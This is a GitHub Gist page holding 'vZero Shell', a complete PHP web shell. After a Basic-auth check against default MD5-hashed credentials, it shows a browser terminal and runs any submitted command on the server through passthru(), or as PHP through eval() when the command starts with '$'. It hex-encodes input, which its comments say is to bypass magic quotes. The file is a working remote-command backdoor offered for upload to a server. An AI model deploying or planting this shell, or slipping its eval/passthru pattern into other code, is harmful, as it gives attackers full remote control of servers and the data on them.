Skip to content

Instantly share code, notes, and snippets.

@max-dark

max-dark/vzsh.php

Created July 16, 2016 17:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save max-dark/faaa1ba3387c8659afa09b38265d2e2c to your computer and use it in GitHub Desktop.
Save max-dark/faaa1ba3387c8659afa09b38265d2e2c to your computer and use it in GitHub Desktop.
Download ZIP
v Zero Shell - simple web-based CLI
Raw
vzsh.php
<?php
/*
________
\___ _/ ___ _ __ ___
.-. ,-, / / / _ \| .-\| / \
\ \/ / _/ /__ | __/| | | | |
\__/ /______\\___||_| \___/
______ _ ___ _ _
/ _____\| |___ / _ \| || |
\_____ \| ,-. || __/| || |
\______/|_| |_|\___/|_||_|
vzsh.php (c)oded by Max Dark
*/
// don't forget to change before upload to server
/** @var string $name default=md5("admin") */
$name = '21232f297a57a5a743894a0e4a801fc3';
/** @var string $pass default=md5("MyVeryLongPassword:)!ChangeMe!") */
$pass = '5bad8c29d2db14e438e1c4e01497ef03';
/** @var string $auth_prompt */
$auth_prompt = 'vZero Shell Authorization';
/**
* @return string
*/
function logo() {
$logo = <<<'TXT'
________
\___ _/ ___ _ __ ___
.-. ,-, / / / _ \| .-\| / \
\ \/ / _/ /__ | __/| | | | |
\__/ /______\\___||_| \___/
______ _ ___ _ _
/ _____\| |___ / _ \| || |
\_____ \| ,-. || __/| || |
\______/|_| |_|\___/|_||_|
vzsh.php (c)oded by Max Dark
TXT;
return $logo;
}
if ( ! isset( $_SERVER['PHP_AUTH_USER'] ) ) {
header( "WWW-Authenticate: Basic realm=\"$auth_prompt\"" );
header( 'HTTP/1.0 401 Unauthorized' );
echo "Bad boy(girl?)";
exit;
} else {
if ( ( md5( $_SERVER['PHP_AUTH_USER'] ) !== $name ) || ( md5( $_SERVER['PHP_AUTH_PW'] ) !== $pass ) ) {
header( "WWW-Authenticate: Basic realm=\"$auth_prompt\"" );
header( 'HTTP/1.0 401 Unauthorized' );
echo "Bad boy(girl?)";
exit;
}
}
/**
* outShell
*
*/
function outShell() {
?><html>
<head><title>vZero Shell</title>
<script>
var httpObj = null;
//var vzDebug=false;
function getObject(id) {
return document.getElementById(id);
}
function getContainer() {
return getObject('ifrm').document.getElementById('vzshContainer');
}
function ShowResult(text) { // добавляем результат обработки команды
var obj = getContainer();
if (obj) {
obj.innerHTML = obj.innerHTML + '<pre>' + text.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;") + '</pre>';
getObject('ifrm').scrollBy(0, 10000);
}
}
// История комманд
var vzHistory = [];//command list
var vzHistPos = -1;//history position
function historyAdd(cmd) {
if (cmd == '')
return;
var hlen = vzHistory.length;
for (var i = hlen - 1; i >= 0; i--) {
if (cmd == vzHistory[i]) {
vzHistPos = hlen;
return;
}
}
vzHistory[hlen] = cmd;
vzHistPos = vzHistory.length;
}
function showHistory() {
var hist = "Command history:\n";
var hlen = vzHistory.length;
if (hlen < 1) {
hist = hist + "\tEmpty\n";
}
for (var i = 0; i < hlen; i++) {
hist = hist + i + ' ' + vzHistory[i] + "\n";
}
ShowResult(hist);
}
function historyUp() {
var cmdObj = getCMDLine();
if (vzHistPos - 1 >= 0) {
vzHistPos--;
cmdObj.value = vzHistory[vzHistPos];
} else {
cmdObj.value = '';
vzHistPos = -1;
}
}
function historyDown() {
var cmdObj = getObject('vzerocmd');
if (vzHistPos + 1 < vzHistory.length) {
vzHistPos++;
cmdObj.value = vzHistory[vzHistPos];
} else {
cmdObj.value = '';
vzHistPos = vzHistory.length;
}
}
// encode query
var vzHex = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'];
function dec2hex(num) {// convert dec -> hex
var res = vzHex[num % 16];
num = Math.floor(num / 16);
res = vzHex[num % 16] + '' + res;
return res;
}
function encode(str) { // Кодирование строки в шенацетиричный вид(для обхода Magic Quotes)
var res = '';
var len = str.length;
for (var i = 0; i < len; i++) {
res = res + dec2hex(str.charCodeAt(i));
}
return res;
}
/*
function decode(str) { // Декодирование строки из шенацетиричного вида
str=str.toLowerCase();
var res='';
len=Math.floor(str.length/2)*2;
for(var i=0;i<len;i+=2) {
res=res+String.fromCharCode(eval('0x'+str.substr(i,2)));
}
return res;
}
*/
function showHelp() {
var hlp = "Please write it!!!\n" +
"vZero is an Interactive Web Shell with command history\n" +
"Keys:\n\tCTRL+Up/Down - history up/down\n" +
"\tEnter - send command\n\tEsc - clear cmd line\n" +
"Commands start with '$' will be translated into php code and executed on server\n" +
"\tExample : $echo(\"\\$_SERVER = \");print_r($_SERVER);\n" +
"Supported commands:\n\tAll Server OS commands + \n" +
"\t!help - show this info\n\t!history - show command history\n" +
"\t!n , where n - number of command in history\n" +
"\t!cls - clear screen\n";
ShowResult(hlp);
}
function getCMDLine() {
return getObject('vzerocmd');
}
function execInternalCommand(cmd) {
if (cmd == 'history') {
showHistory();
} else if (cmd == 'help') {
showHelp();
} else if (cmd == 'cls') {
getContainer().innerHTML = '';
} else {
var idx = parseInt(cmd);
if (isNaN(idx)) {
ShowResult("Invalid command : !" + cmd + "\n");
} else {
if ((idx >= 0) && (idx < vzHistory.length)) {
getCMDLine().value = vzHistory[idx];
sendQuery();
}
}
}
}
function writeIframe(idoc) {
idoc.write(
"<html><head><style type='text/css'>" +
"body{background-color :black;color:#d3d3d3;border : none;" +
"font-family:Courier New,Verdana,monospace;" +
"font-size:12px;" +
"scrollbar-face-color:#191919;" +
"scrollbar-shadow-color:#505050;" +
"scrollbar-highlight-color:#505050;" +
"scrollbar-3dlight-color:black;" +
"scrollbar-darkshadow-color:black;" +
"scrollbar-track-color:#191919;" +
"scrollbar-arrow-color:#505050;}" +
"</style></head><body>< id=vzshContainer><code>vZero Shell\ntype '!help' for more info</code></pre></body></html>"
);
idoc.close();
}
function hKeyDown(event) {
var c = (typeof(event.which) == 'number') ? event.which : (
(typeof(event.keyCode) == 'number') ? event.keyCode : (
(typeof(event.charCode) == 'number') ? event.charCode : 0
)
);
switch (c) {
case 13://enter
sendQuery();
break;
case 27://Escape
clearCmd();
break;
case 38://Up
if (event.ctrlKey) {
historyUp();
}
break;
case 40://Down
if (event.ctrlKey) {
historyDown();
}
break;
}
return true;
}
function httpObjReady() {
var w = window;
switch (httpObj.readyState) {
case 0:
break;
case 1:
w.status = 'Connecting to server ...';
break;
case 2:
w.status = 'Send command';
break;
case 3:
w.status = 'Load result';
break;
case 4:
ShowResult(httpObj.responseText);
w.status = 'Ready. Server status : ' + httpObj.status + ' ' + httpObj.statusText;
break;
}
}
function clearCmd() { // Clear command line
var cmdObj = getCMDLine();
cmdObj.value = '';
cmdObj.focus();
}
function sendQuery() {
var cmdObj = getCMDLine();
if (cmdObj.value.charAt(0) == '!') {
execInternalCommand(cmdObj.value.substring(1, cmdObj.value.length));
} else {
historyAdd(cmdObj.value);
if (window.XMLHttpRequest) {
httpObj = new XMLHttpRequest();
httpObj.onload = httpObjReady;
} else if (window.ActiveXObject) {
httpObj = new ActiveXObject("Microsoft.XMLHTTP");
httpObj.onreadystatechange = httpObjReady;
} else {
httpObj = null;
}
if (httpObj) {
httpObj.open("POST", '<?php echo $_SERVER['PHP_SELF'];?>', true);
httpObj.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
httpObj.send('vzerocmd=' + encode(cmdObj.value));
}
}
cmdObj.value = '';
cmdObj.focus();
return true;
}
</script>
<style type='text/css'>
body, iframe, input {
background-color: black;
color: #d3d3d3;
border: none;
font-family: Courier New, Verdana, monospace;
font-size: 12px;
scrollbar-face-color: #191919;
scrollbar-shadow-color: #505050;
scrollbar-highlight-color: #505050;
scrollbar-3dlight-color: black;
scrollbar-darkshadow-color: black;
scrollbar-track-color: #191919;
scrollbar-arrow-color: #505050;
}
input.shell_control {
background-color: #191919;
border: solid 1px #505050;
color: #505050
}
input.shell_text {
background-color: #191919;
border: solid 1px #303030;
color: #d3d3d3
}
</style>
</head>
<body>
<iframe id=ifrm name=ifrm width=96% height=90% src='' style="border: 0"></iframe>
<br/>
<nobr>
><input placeholder="enter command" id=vzerocmd class=shell_text size=120 onkeydown='hKeyDown(event);'>
<input type=button class=shell_control value=send onclick='sendQuery();'>
<input type=button class=shell_control value=clear onclick='clearCmd();'>
</nobr>
<script>writeIframe(getObject('ifrm').document);
getObject('vzerocmd').focus();</script>
</body>
</html><?php
}
/*
function hex_encode($str) {
$len=strlen($str);
$i=0;
$res='';
for($i=0;$i<$len;$i++) {
$c=ord($str[$i]);
if($c!=0x0) {
if($c<0x10)
$res.='0';
$res.=dechex($c);
} else {
$res.='00';
}
}
return $res;
}*/
function hex_decode( $str ) {
$len = floor( strlen( $str ) / 2 ) * 2;
$res = '';
for ( $i = 0; $i < $len; $i += 2 ) {
$res .= chr( hexdec( ( $str[ $i ] ) . ( $str[ $i + 1 ] ) ) );
}
return $res;
}
/**
* @param string $cmd
*/
function executeQuery( $cmd ) {
if ( empty( $cmd ) ) {
echo logo();
} else {
$cmd = hex_decode( $cmd );
echo getcwd() . ">$cmd\n";
if ( $cmd[0] == '$' ) {
$cmd = substr( $cmd, 1, strlen( $cmd ) - 1 );
echo "Eval $cmd :\n";
echo eval( $cmd );
} else {
passthru( $cmd );
}
}
}
if ( isset( $_POST['vzerocmd'] ) ) {
executeQuery( $_POST['vzerocmd'] );
} else {
outShell();
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment